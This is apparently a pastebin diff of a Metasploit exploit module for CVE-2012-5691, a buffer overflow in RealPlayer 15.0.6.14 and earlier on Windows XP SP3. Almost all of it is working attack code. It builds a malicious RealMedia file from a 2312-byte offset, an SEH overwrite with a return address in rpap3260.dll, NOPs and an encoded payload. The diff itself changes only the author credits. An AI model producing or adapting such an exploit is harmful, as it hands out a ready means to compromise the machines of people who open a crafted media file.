SHOW:
|
|
- or go back to the newest paste.
1 | ## | |
2 | # This file is part of the Metasploit Framework and may be subject to | |
3 | # redistribution and commercial restrictions. Please see the Metasploit | |
4 | # Framework web site for more information on licensing and terms of use. | |
5 | # http://metasploit.com/framework/ | |
6 | ## | |
7 | ||
8 | require 'msf/core' | |
9 | ||
10 | class Metasploit3 < Msf::Exploit::Remote | |
11 | #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking | |
12 | #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking | |
13 | Rank = NormalRanking | |
14 | ||
15 | include Msf::Exploit::FILEFORMAT | |
16 | include Msf::Exploit::Seh | |
17 | ||
18 | def initialize(info = {}) | |
19 | super(update_info(info, | |
20 | 'Name' => 'RealPlayer BoF 0Day', | |
21 | 'Description' => %q{ | |
22 | Buffer overflow with RealMedia files vulnerability | |
23 | Affected software: Windows RealPlayer 15.0.6.14 and prior. | |
24 | }, | |
25 | 'License' => MSF_LICENSE, | |
26 | 'Author' => | |
27 | [ | |
28 | - | 'suto@vnsecurity.net trongnguyen0205@gmail.com', # Original discovery |
28 | + | 'suto(https://twitter.com/toanphamvan) ', # Original discovery |
29 | - | 'suto', # MSF Module |
29 | + | 'trongnguyen0205@gmail.com', # MSF Module |
30 | ], | |
31 | 'References' => | |
32 | [ | |
33 | [ 'OSVDB', '<insert OSVDB number here>' ], | |
34 | [ 'CVE', 'CVE-2012-5691' ], | |
35 | [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ] | |
36 | ], | |
37 | 'DefaultOptions' => | |
38 | { | |
39 | 'ExitFunction' => 'process', #none/process/thread/seh | |
40 | #'InitialAutoRunScript' => 'migrate -f', | |
41 | }, | |
42 | 'Platform' => 'win', | |
43 | 'Payload' => | |
44 | { | |
45 | 'BadChars' => "\x0d", # <change if needed> | |
46 | 'DisableNops' => true, | |
47 | }, | |
48 | ||
49 | 'Targets' => | |
50 | [ | |
51 | [ 'Windows XP SP3', | |
52 | { | |
53 | 'Ret' => 0x5acd5121 , | |
54 | 'Offset' => 2312 | |
55 | } | |
56 | ], # pop ebx # pop esi # ret - rpap3260.dll | |
57 | ], | |
58 | 'Privileged' => false, | |
59 | #Correct Date Format: "M D Y" | |
60 | #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec | |
61 | 'DisclosureDate' => 'MONTH DAY YEAR', | |
62 | 'DefaultTarget' => 0)) | |
63 | ||
64 | register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class) | |
65 | ||
66 | end | |
67 | ||
68 | def exploit | |
69 | content = "[InternetShortcut]\nURL=" | |
70 | buffer = "A"*2312 | |
71 | buffer << generate_seh_record(target.ret) | |
72 | buffer << make_nops(30) | |
73 | buffer << payload.encoded #522 bytes of space | |
74 | filecontent = content+buffer+"B"*5000 | |
75 | file_create(filecontent) | |
76 | ||
77 | end | |
78 | end |